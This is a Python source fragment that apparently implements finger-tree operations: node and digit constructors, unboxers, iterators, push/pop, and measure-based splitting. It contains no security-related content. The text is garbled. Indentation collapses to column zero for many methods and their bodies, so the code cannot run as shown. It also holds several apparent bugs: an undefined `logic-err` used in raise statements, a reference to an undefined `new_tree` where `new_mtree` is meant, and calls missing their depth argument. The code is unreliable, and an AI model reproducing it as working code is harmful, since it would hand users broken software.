        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        #a node's child count must be a legal nen
        nen = len(xnode_seq)
        sf._check_nen(nen)
        #auto_info is computed from the children, then handed to the raw ctor
        auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        node = type(sf).___mk_node__not_auto___(sf, depth, xnode_seq, auto_info)
        sf.careless_check_depth_of_node(depth, node)
        return node
    @abstractmethod
    def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
    def mk_digit(sf, depth, xnode_seq, /):
        'depth -> [xnode<depth-1>] -> digit<depth> #see:___mk_digit__not_auto___'
        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        #a digit's child count must be a legal den (min_den..max_den)
        den = len(xnode_seq)
        sf._check_den(den)
        auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        digit = type(sf).___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info)
        sf.careless_check_depth_of_digit(depth, digit)
        return digit
    @abstractmethod
    def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
    def mk_line_tree(sf, depth, xnode_seq, /):
        'depth -> [xnode<depth-1>] -> line_tree<depth> #see:___mk_line_tree__not_auto___'
        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        #a line tree may be shorter than a digit (down to 0 children)
        sz0 = len(xnode_seq)
        sf._check_len_line_tree(sz0)
        auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        line_tree = type(sf).___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info)
        sf.careless_check_depth_of_line_tree(depth, line_tree)
        return line_tree
@abstractmethod
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
def mk_deep_tree(sf, depth, ldigit, mtree, rdigit, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> deep_tree<depth> #see:___mk_deep_tree__not_auto___'
sf.careless_check_depth_of_digit(depth, ldigit)
sf.careless_check_depth_of_digit(depth, rdigit)
sf.careless_check_depth_of_tree(depth+1, mtree)
auto_infoL = sf.get_auto_info_from_digit(depth, ldigit)
auto_infoR = sf.get_auto_info_from_digit(depth, rdigit)
auto_infoM = sf.get_auto_info_from_tree(depth+1, mtree)
auto_infos = [auto_infoL, auto_infoM, auto_infoR]
auto_info = sf.calc_auto_info_from_auto_infos(depth, auto_infos)
sf.careless_check_auto_info(auto_info)
deep_tree = type(sf).___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info)
sf.careless_check_depth_of_deep_tree(depth, deep_tree)
return deep_tree
    #-- unboxers --------------------------------------------------------------
    #Each unbox_* is the inverse of the corresponding mk_*: it returns the raw
    #constructor arguments plus the stored auto_info, re-validating both the
    #input box and every extracted part.
    @abstractmethod
    def ___unbox_element___(sf, element, /):
        'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
    def unbox_element(sf, element, /):
        'boxed element -> (raw user_obj, auto_info) #see:___unbox_element___'
        sf.careless_check_element(element)
        user_obj, auto_info = type(sf).___unbox_element___(sf, element)
        sf.careless_check_user_obj(user_obj)
        sf.careless_check_auto_info(auto_info)
        return user_obj, auto_info
    @abstractmethod
    def ___unbox_node___(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
    def unbox_node(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_node___'
        sf.careless_check_depth_of_node(depth, node)
        xnode_seq, auto_info = type(sf).___unbox_node___(sf, depth, node)
        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        #the stored children must still form a legal node size
        nen = len(xnode_seq)
        sf._check_nen(nen)
        return xnode_seq, auto_info
    @abstractmethod
    def ___unbox_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
    def unbox_digit(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_digit___'
        sf.careless_check_depth_of_digit(depth, digit)
        xnode_seq, auto_info = type(sf).___unbox_digit___(sf, depth, digit)
        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        #the stored children must still form a legal digit size
        den = len(xnode_seq)
        sf._check_den(den)
        return xnode_seq, auto_info
    @abstractmethod
    def ___unbox_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
    def unbox_line_tree(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_line_tree___'
        sf.careless_check_depth_of_line_tree(depth, line_tree)
        xnode_seq, auto_info = type(sf).___unbox_line_tree___(sf, depth, line_tree)
        sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
        sf.careless_check_auto_info(auto_info)
        sz0 = len(xnode_seq)
        sf._check_len_line_tree(sz0)
        return xnode_seq, auto_info
    @abstractmethod
    def ___unbox_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
    def unbox_deep_tree(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:___unbox_deep_tree___'
        sf.careless_check_depth_of_deep_tree(depth, deep_tree)
        ldigit, mtree, rdigit, auto_info = type(sf).___unbox_deep_tree___(sf, depth, deep_tree)
        sf.careless_check_depth_of_digit(depth, ldigit)
        sf.careless_check_depth_of_digit(depth, rdigit)
        #the middle subtree lives one level deeper
        sf.careless_check_depth_of_tree(depth+1, mtree)
        sf.careless_check_auto_info(auto_info)
        return ldigit, mtree, rdigit, auto_info
    @abstractmethod
    def ___is_tree_line___(sf, depth, tree, /):
        'depth -> tree<depth> -> bool'
    def is_tree_line(sf, depth, tree, /):
        'depth -> tree<depth> -> bool'
        sf.careless_check_depth_of_tree(depth, tree)
        return sf._is_tree_line(depth, tree)
    def _is_tree_line(sf, depth, tree, /):
        'depth -> tree<depth> -> bool  #unchecked-input variant, used by careless_check_depth_of_tree to avoid recursion'
        b = type(sf).___is_tree_line___(sf, depth, tree)
        check_bool(b)
        return b
    def is_tree_deep(sf, depth, tree, /):
        'depth -> tree<depth> -> bool  #a tree is exactly one of line/deep'
        return not sf.is_tree_line(depth, tree)
    def mk_top_tree_from_user_objs(sf, user_objs, /,*, reverse:bool):
        'Iter user_obj -> tree<depth=0> #see:mk_tree_from_xnode_seq/ipushL__top_tree'
        depth = 0
        #NOTE(review): the `if 0:` branch is a deliberately disabled bulk-build
        #alternative (box all, then mk_tree_from_xnode_seq); the live path
        #builds incrementally via ipush instead.
        if 0:
            element_seq = list(map(sf.mk_element, user_objs))
            xnode_seq = element_seq
            if reverse:
                xnode_seq.reverse()
            top_tree = sf.mk_tree_from_xnode_seq(depth, xnode_seq)
        else:
            top_tree = sf.mk_empty_tree(depth)
            #pushing each item at the LEFT end yields the reversed order
            ipush = sf.ipushL__top_tree if reverse else sf.ipushR__top_tree
            for user_obj in user_objs:
                top_tree = ipush(top_tree, user_obj)
        return top_tree
def iter_user_objs__tree(sf, depth, tree, /,*, reverse:bool):
'depth -> tree<depth> -> Iter user_obj'
if sf.is_tree_line(depth, tree):
return sf.iter_user_objs__line_tree(depth, tree, reverse=reverse)
else:
return sf.iter_user_objs__deep_tree(depth, tree, reverse=reverse)
def iter_user_objs__deep_tree(sf, depth, deep_tree, /,*, reverse:bool):
'depth -> deep_tree<depth> -> Iter user_obj'
(ldigit, mtree, rdigit, auto_info) = sf.unbox_deep_tree(depth, deep_tree)
if reverse:
ldigit, rdigit = rdigit, ldigit
yield from sf.iter_user_objs__digit(depth, ldigit, reverse=reverse)
yield from sf.iter_user_objs__tree(depth+1, mtree, reverse=reverse)
yield from sf.iter_user_objs__digit(depth, rdigit, reverse=reverse)
return
def iter_user_objs__line_tree(sf, depth, line_tree, /,*, reverse:bool):
'depth -> line_tree<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_line_tree(depth, line_tree)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__digit(sf, depth, digit, /,*, reverse:bool):
'depth -> digit<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_digit(depth, digit)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__xnode_seq(sf, depth, xnode_seq, /,*, reverse:bool):
'depth -> [xnode<depth-1>] -> Iter user_obj'
f = reversed if reverse else iter
for xnode in f(xnode_seq):
yield from sf.iter_user_objs__xnode(depth, xnode, reverse=reverse)
def iter_user_objs__xnode(sf, depth, xnode, /,*, reverse:bool):
'depth -> xnode<depth-1> -> Iter user_obj'
check_uint(depth)
if depth:
node = xnode
depth -= 1
return sf.iter_user_objs__node(depth, node, reverse=reverse)
else:
element = xnode
return sf.iter_user_objs__element(element, reverse=reverse)
def iter_user_objs__node(sf, depth, node, /,*, reverse:bool):
'depth -> node<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_node(depth, node)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__element(sf, element, /,*, reverse:bool):
'element -> Iter user_obj'
user_obj, auto_info = sf.unbox_element(element)
yield user_obj
return
def mk_empty_tree(sf, depth, /):
'depth -> tree<depth>{len=0}'
empty_tree = sf.mk_line_tree(depth, ())
return empty_tree
def mk_tree(sf, depth, is_deep_tree, payload, /):
'depth -> (is_deep_tree::bool) -> (payload::tuple{see args@mk_deep_tree/mk_line_tree}) -> tree<depth>'
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
deep_tree = sf.mk_deep_tree(depth, ldigit, mtree, rdigit)
new_tree = deep_tree
else:
(xnode_seq,) = payload
line_tree = sf.mk_line_tree(depth, xnode_seq)
new_tree = line_tree
return new_tree
def unbox_tree(sf, depth, tree, /):
'depth -> tree<depth> -> ((is_deep_tree::bool), (payload::tuple{see args@mk_deep_tree/mk_line_tree}), auto_info)'
is_deep_tree = sf.is_tree_deep(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit, auto_info) = sf.unbox_deep_tree(depth, tree)
payload = (ldigit, mtree, rdigit)
else:
(xnode_seq, auto_info) = sf.unbox_line_tree(depth, tree)
payload = (xnode_seq,)
return is_deep_tree, payload, auto_info
def get_auto_info_from_tree(sf, depth, tree, /):
'depth -> tree<depth> -> auto_info'
is_deep_tree = sf.is_tree_deep(depth, tree)
if is_deep_tree:
auto_info = sf.get_auto_info_from_deep_tree(depth, tree)
else:
auto_info = sf.get_auto_info_from_line_tree(depth, tree)
return auto_info
    def mk_tree_from_xnode_seq(sf, depth, xnode_seq, /):
        'depth -> [xnode<depth-1>] -> tree<depth>'
        min_den, max_den = sf.get_min_max_digit_element_number_pair()
        def _recur_mk_tree_from_xnode_seq(depth, xnode_seq, /):
            #short sequences fit in a single line tree (see line_tree grammar:
            #len <- [0..2*min_den-1])
            sz = len(xnode_seq)
            if sz < 2*min_den:
                new_tree = sf.mk_line_tree(depth, xnode_seq)
            else:
                #split into left digit / middle nodes / right digit (helper
                #defined elsewhere); the middle nodes form the child sequence
                #of the subtree one level deeper -- recursion presumably
                #terminates because node_seqM is strictly shorter (TODO confirm
                #against xnode_seq2ldigit_node_seq_rdigit__q).
                (ldigit, node_seqM, rdigit) = sf.xnode_seq2ldigit_node_seq_rdigit__q(depth, xnode_seq)
                new_mtree = _recur_mk_tree_from_xnode_seq(depth+1, node_seqM)
                new_tree = sf.mk_deep_tree(depth, ldigit, new_mtree, rdigit)
            return new_tree
        #end of def _recur_mk_tree_from_xnode_seq(depth, xnode_seq, /):
        new_tree = _recur_mk_tree_from_xnode_seq(depth, xnode_seq)
        return new_tree
    #end of def mk_tree_from_xnode_seq(sf, depth, xnode_seq, /):
def mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
'depth -> [xnode<depth-1>] -> tree<depth+1> -> digit<depth> -> tree<depth>'
#(xnode_seqL, mtree, rdigit)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
#def _recur_mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
sz = len(xnode_seqL)
if sz <= max_den:
xnode_seqLs = [xnode_seqL]
def _put(xnode_seq, /):
nonlocal sz
xnode_seqLs.append(xnode_seq)
sz += len(xnode_seq)
def _join():
new_xnode_seqL = tuple(itertools.chain.from_iterable(xnode_seqLs))
assert len(new_xnode_seqL) == sz
return new_xnode_seqL
while sz < min_den:
#(xnode_seqLs, mtree, rdigit)
m = sf.may_ipopL__tree(depth+1, mtree)
if m is None:
#(xnode_seqLs, (), rdigit)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, rdigit)
_put(xnode_seqR)
new_xnode_seqL = _join()
#(xnode_seqLs, (), ())
new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seqL)
break
else:
mtree, node = m
xnode_seqM, auto_info = sf.unbox_node(depth, node)
#(xnode_seqLs, xnode_seqM, mtree, rdigit)
_put(xnode_seqM)
#(xnode_seqLs, mtree, rdigit)
else:
#(xnode_seqLs, mtree, rdigit)
if not min_den <= sz <= max_den: raise logic-err #<<== max_nen <= max_den-min_den
#new_mtree = mtree
new_xnode_seqL = _join()
ldigit = sf.mk_digit(depth, new_xnode_seqL)
new_tree = sf.mk_deep_tree(depth, ldigit, mtree, rdigit)
new_tree
else:
ldigit, node_seqL = sf.xnode_seq2ldigit_node_seq__qd(depth, xnode_seqL)
#(ldigit, node_seqL, mtree, rdigit)
new_mtree = sf.join__qt(depth+1, node_seqL, mtree)
#_recur_mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size
#(ldigit, new_mtree, rdigit)
new_tree = sf.mk_deep_tree(depth, ldigit, new_tree, rdigit)
return new_tree
#end of def mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
def mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(sf, depth, ldigit, mtree, xnode_seqR, /):
'depth -> digit<depth> -> tree<depth+1> -> [xnode<depth-1>] -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, tuple_reversed(xnode_seqR), mtree, ldigit)
#input flip here!!!
def is_empty__tree(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
return sf.is_tree_line(depth, tree) and not sf.get_num_child_xnode_seq_of_line_tree(depth, tree)
def __tail__may_ipopX__top_tree(sf, may, /):
'may (tree<depth=0>, element) -> may (tree<depth=0>, user_obj)'
if may is None:
return None
else:
new_tree, element = may
user_obj, auto_info = sf.unbox_element(element)
return new_tree, user_obj
def may_ipopL__top_tree(sf, top_tree, /):
'tree<depth=0> -> may (tree<depth=0>, user_obj)'
may = sf.may_ipopL__tree(0, top_tree)
return sf.__tail__may_ipopX__top_tree(may)
def may_ipopR__top_tree(sf, top_tree, /):
'tree<depth=0> -> may (tree<depth=0>, user_obj)'
may = sf.may_ipopR__tree(0, top_tree)
return sf.__tail__may_ipopX__top_tree(may)
def may_ipopL__tree(sf, depth, tree, /):
'depth -> tree<depth> -> may (tree<depth>, xnode<depth-1>)'
(is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
(xnode_seq, auto_info) = sf.unbox_digit(depth, ldigit)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
head, tail = xnode_seq[0], xnode_seq[1:]
if len(xnode_seq) > min_den:
tail_ldigit = sf.mk_digit(depth, tail)
tail_tree = sf.mk_deep_tree(depth, tail_ldigit, mtree, rdigit)
m = (head, tail_tree)
elif len(xnode_seq) == min_den:
m1 = sf.may_ipopL__tree(depth+1, mtree)
if m1 is None:
(xnode_seqR, auto_info) = sf.unbox_digit(depth, rdigit)
tail_tree = sf.mk_tree_from_xnode_seq(depth, (*tail, *xnode_seqR))
m = (head, tail_tree)
else:
(new_mtree, shifted_node) = m1
(shifted_xnode_seq, auto_info) = sf.unbox_node(depth, shifted_node)
new_xnode_seqL = (*tail, *shifted_xnode_seq)
if not min_den+1 <= len(new_xnode_seqL) <= max_den-1: raise logic-err
new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
tail_tree = sf.mk_deep_tree(depth, new_ldigit, new_mtree, rdigit)
m = (head, tail_tree)
else:
raise logic-err
else:
(xnode_seq,) = payload
if not xnode_seq:
m = None
else:
head, tail = xnode_seq[0], xnode_seq[1:]
tail_tree = sf.mk_line_tree(depth, tail)
m = (head, tail_tree)
return m
def may_ipopR__tree(sf, depth, tree, /):
'depth -> tree<depth> -> may (tree<depth>, xnode<depth-1>)'
ops = mk_ReversedFingerTreeOps(sf)
return ops.may_ipopL__tree(depth, tree)
def ipushL__top_tree(sf, top_tree, user_obj, /):
'tree<depth=0> -> user_obj -> tree<depth=0>'
element = sf.mk_element(user_obj)
return sf.ipushL__tree(0, top_tree, element)
def ipushR__top_tree(sf, top_tree, user_obj, /):
'tree<depth=0> -> user_obj -> tree<depth=0>'
element = sf.mk_element(user_obj)
return sf.ipushR__tree(0, top_tree, element)
    def ipushL__tree(sf, depth, tree, xnode, /):
        'depth -> tree<depth> -> xnode<depth-1> -> tree<depth>'
        (is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
        if is_deep_tree:
            (ldigit, mtree, rdigit) = payload
            (xnode_seq, auto_info) = sf.unbox_digit(depth, ldigit)
            min_den, max_den = sf.get_min_max_digit_element_number_pair()
            if len(xnode_seq) < max_den:
                #room in the left digit: just prepend
                new_xnode_seqL = (xnode, *xnode_seq)
                new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
                new_tree = sf.mk_deep_tree(depth, new_ldigit, mtree, rdigit)
            elif len(xnode_seq) == max_den:
                #left digit full: keep num_remain children plus the new xnode
                #as the digit, pack the remaining overflow_nen children into a
                #node and push that node into the middle tree
                #(_ops_check_overflow_nen guarantees both sizes are legal)
                #recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
                overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
                num_remain = max_den-overflow_nen
                new_xnode_seqL = (xnode, *xnode_seq[:num_remain])
                new_node = sf.mk_node(depth, xnode_seq[num_remain:])
                new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
                new_mtree = sf.ipushL__tree(depth+1, mtree, new_node)
                new_tree = sf.mk_deep_tree(depth, new_ldigit, new_mtree, rdigit)
            else:
                #a digit can never exceed max_den children
                raise logic-err
        else:
            #line tree: prepend and rebuild (may promote to a deep tree)
            (xnode_seq,) = payload
            new_xnode_seq = (xnode, *xnode_seq)
            new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seq)
        return new_tree
def ipushR__tree(sf, depth, tree, xnode, /):
'depth -> tree<depth> -> xnode<depth-1> -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.ipushL__tree(depth, tree, xnode)
r'''outdated by +tmay_mid_xnode
isplit L/R tree
a = auto_info
r = measured_result
isplit L tree:
[nonempty ltree] ==>> [not ok (init r, ltree)]
[nonempty rtree] ==>> [ok (init r, ltree, head rtree)]
isplit R tree:
[nonempty rtree] ==>> [not ok (rtree, init r)]
[nonempty ltree] ==>> [ok (last ltree, rtree, init r)]
#'''
def get_auto_info_from_xnode(sf, depth, xnode, /):
'depth -> xnode<depth-1> -> auto_info #input depth instead of imay_depth!!!'
#input depth instead of depth-1!!!
#check_uint_imay
check_uint(depth)
if depth:
node = xnode
auto_info = sf.get_auto_info_from_node(depth-1, node)
else:
element = xnode
auto_info = sf.get_auto_info_from_element(element)
return auto_info
    def __isplitL__xnode_seq(sf, depth, xnode_seq, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
        r'''depth -> [xnode<depth-1>] -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (xnode_seqL::[xnode<depth-1>], measured_result_before_mid_xnode, mid_xnode::xnode<depth-1>, xnode_seqR::[xnode<depth-1>])
        precondition:
            [nonempty xnode_seq]
            [ok(init, xnode_seq)]
        #'''
        monoid_ops4measured_result = measurable_ops4auto_info.get_monoid_ops4measured_result()
        _get_auto_info = sf.get_auto_info_from_xnode
        #accumulate measures left to right until the predicate first turns ok;
        #that child becomes mid_xnode
        acc_measured_result = init_measured_result
        for i, xnode in enumerate(xnode_seq):
            auto_info = _get_auto_info(depth, xnode)
            #not depth-1!!!
            measured_result = measurable_ops4auto_info.measure(auto_info)
            old_acc = acc_measured_result
            acc_measured_result = monoid_ops4measured_result.assoc_bin_op(old_acc, measured_result)
            if measured_result2is_ok(acc_measured_result):
                mid_xnode = xnode
                #the accumulated measure EXCLUDING mid_xnode
                measured_result_before_mid_xnode = old_acc
                break
        else:
            #for/else: loop ran to completion without break, i.e. the precondition
            #[ok(init, xnode_seq)] was violated.  NOTE(review): `logic-err` is an
            #undefined name; raising it surfaces a NameError (project's
            #assert-unreachable idiom, apparently).
            i = len(xnode_seq)
            raise logic-err#precondition
        #split around position i; the assert re-checks the identity of mid_xnode
        xnode_seqL, _mid_xnode, xnode_seqR = xnode_seq[:i], xnode_seq[i], xnode_seq[i+1:]
        assert mid_xnode is _mid_xnode
        xnode_seqL = tuple(xnode_seqL)
        xnode_seqR = tuple(xnode_seqR)
        return xnode_seqL, measured_result_before_mid_xnode, mid_xnode, xnode_seqR
def isplitL__tree(sf, depth, tree, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
#return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, measured_result_after_ltree, tmay_mid_xnode::(tmay xnode<depth-1>), rtree::tree<depth>, mxrtree::tree<depth>)
[toList tree === toList ltree ++ toList tmay_mid_xnode ++ toList rtree]
[toList tree === toList ltree ++ toList mxrtree]
[toList mxrtree === toList tmay_mid_xnode ++ toList rtree]
[tmay_mid_xnode === tmay_head mxrtree]
[measured_result_after_ltree === measure(init, ltree)]
[nonempty ltree] ==>> [not ok(init, ltree)]
[ok(init, ltree)] ==>> [empty ltree]
[nonempty tmay_mid_xnode] ==>> [ok(init, ltree ++++ tmay_mid_xnode)]
[empty tmay_mid_xnode] <==> [empty mxrtree] <==> [tree === ltree] <==> [empty tree]or[not ok(init, tree)]
[empty tmay_mid_xnode] ==>> [empty rtree]
[nonempty tmay_mid_xnode] <==> [nonempty tree][ok(init, tree)]
#'''
monoid_ops4measured_result = measurable_ops4auto_info.get_monoid_ops4measured_result()
def _main_isplitL__tree():
if sf.is_empty__tree(depth, tree):
#[empty tree]
empty_tree = tree
ltree = rtree = mxrtree = empty_tree
tmay_mid_xnode = ()
measured_result_after_ltree = init_measured_result
else:
#[nonempty tree]
auto_infoT = sf.get_auto_info_from_tree(depth, tree)
measured_resultT = measurable_ops4auto_info.measure(auto_infoT)
measured_result_IT = monoid_ops4measured_result.assoc_bin_op(init_measured_result, measured_resultT)
if measured_result2is_ok(measured_result_IT):
#[nonempty tree][ok(init, tree)]
#<==>[nonempty tmay_mid_xnode]
ltree, measured_result_before_mid_xnode, mid_xnode, rtree = _recur_isplitL__tree(depth, tree, init_measured_result)
measured_result_after_ltree = measured_result_before_mid_xnode
if sf.is_empty__tree(depth, rtree):
empty_tree = rtree
ltree, mid_xnode = sf.may_ipopR__tree(depth, tree)
rtree = empty_tree
else:
pass
tmay_mid_xnode = (mid_xnode,)
if sf.is_empty__tree(depth, ltree):
empty_tree = ltree
mxrtree = tree
rtree, mid_xnode = sf.may_ipopL__tree(depth, mxrtree)
ltree = empty_tree
else:
mxrtree = sf.ipushL__tree(depth, rtree, mid_xnode)
mxrtree
else:
#[nonempty tree][not ok(init, tree)]
ltree = tree
tmay_mid_xnode = ()
rtree = mxrtree = sf.mk_empty_tree(depth)
measured_result_after_ltree = measured_result_IT
return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
#end of def _main_isplitL__tree():
def _recur_isplitL__tree(depth, tree, init_measured_result, /):
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, measured_result_before_mid_xnode, mid_xnode::xnode<depth-1>, rtree::tree<depth>) #MUST xnode, not tmay
precondition:
[nonempty tree]
[ok(init, tree)]
#'''
(is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
auto_infoL = sf.get_auto_info_from_digit(ldigit)
measured_resultL = measurable_ops4auto_info.measure(auto_infoL)
measured_result_IL = monoid_ops4measured_result.assoc_bin_op(init_measured_result, measured_resultL)
if measured_result2is_ok(measured_result_IL):
(xnode_seqL, auto_infoL) = sf.unbox_digit(depth, ldigit)
xnode_seq_LL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_LR = sf.__isplitL__xnode_seq(depth, xnode_seqL, measurable_ops4auto_info, init_measured_result, measured_result2is_ok)
ltree = sf.mk_line_tree(depth, xnode_seq_LL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, xnode_seq_LR, mtree, rdigit)
else:
auto_infoM = sf.get_auto_info_from_tree(mtree)
measured_resultM = measurable_ops4auto_info.measure(auto_infoM)
measured_result_ILM = monoid_ops4measured_result.assoc_bin_op(measured_result_IL, measured_resultM)
if measured_result2is_ok(measured_result_ILM):
mtreeL, measured_result_before_mid_node, mid_node, mtreeR = _recur_isplitL__tree(depth+1, mtree, measured_result_IL)
mid_xnode_seq, auto_info = sf.unbox_node(depth, mid_node)
mid_xnode_seqL, measured_result_before_mid_xnode, mid_xnode, mid_xnode_seqR = sf.__isplitL__xnode_seq(depth, mid_xnode_seq, measurable_ops4auto_info, measured_result_before_mid_node, measured_result2is_ok)
ltree = sf.mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(depth, ldigit, mtreeL, mid_xnode_seqL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, mid_xnode_seqR, mtreeR, rdigit)
else:
auto_infoR = sf.get_auto_info_from_digit(rdigit)
measured_resultR = measurable_ops4auto_info.measure(auto_infoR)
measured_result_ILMR = monoid_ops4measured_result.assoc_bin_op(measured_result_ILM, measured_resultR)
if measured_result2is_ok(measured_result_ILMR):
(xnode_seqR, auto_infoR) = sf.unbox_digit(depth, rdigit)
xnode_seq_RL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_RR = sf.__isplitL__xnode_seq(depth, xnode_seqR, measurable_ops4auto_info, measured_result_ILM, measured_result2is_ok)
ltree = sf.mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(depth, ldigit, mtree, xnode_seq_RL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_line_tree(depth, xnode_seq_RR)
else:
raise logic-err
else:
(xnode_seqT,) = payload
xnode_seq_TL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_TR = sf.__isplitL__xnode_seq(depth, xnode_seqT, measurable_ops4auto_info, init_measured_result, measured_result2is_ok)
ltree = sf.mk_line_tree(depth, xnode_seq_TL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_line_tree(depth, xnode_seq_TR)
return ltree, measured_result_before_mid_xnode, mid_xnode, rtree
#end of def _recur_isplitL__tree
(ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree) = _main_isplitL__tree()
return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
#end of def isplitL__tree
def isplitR__tree(sf, depth, tree, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
#return (lmxtree, ltree, tmay_mid_xnode, measured_result_before_rtree, rtree)
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (lmxtree::tree<depth>, ltree::tree<depth>, tmay_mid_xnode::(tmay xnode<depth-1>), measured_result_before_rtree, rtree::tree<depth>)
[toList tree === toList ltree ++ toList tmay_mid_xnode ++ toList rtree]
[toList tree === toList lmxtree ++ toList rtree]
[toList lmxtree === toList ltree ++ toList tmay_mid_xnode]
[tmay_mid_xnode === tmay_last lmxtree]
[measured_result_before_rtree === measureR(rtree, init)]
[nonempty rtree] ==>> [not okR(rtree, init)]
[okR(rtree, init)] ==>> [empty rtree]
[nonempty tmay_mid_xnode] ==>> [okR(tmay_mid_xnode ++++ rtree, init)]
[empty tmay_mid_xnode] <==> [empty lmxtree] <==> [tree === rtree] <==> [empty tree]or[not okR(tree, init)]
[empty tmay_mid_xnode] ==>> [empty ltree]
[nonempty tmay_mid_xnode] <==> [nonempty tree][okR(tree, init)]
#'''
######################
'old api: depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, rtree::tree<depth>)'
ops = mk_ReversedFingerTreeOps(sf)
ops4auto_info = mk_ReversedMeasurableOps(measurable_ops4auto_info)
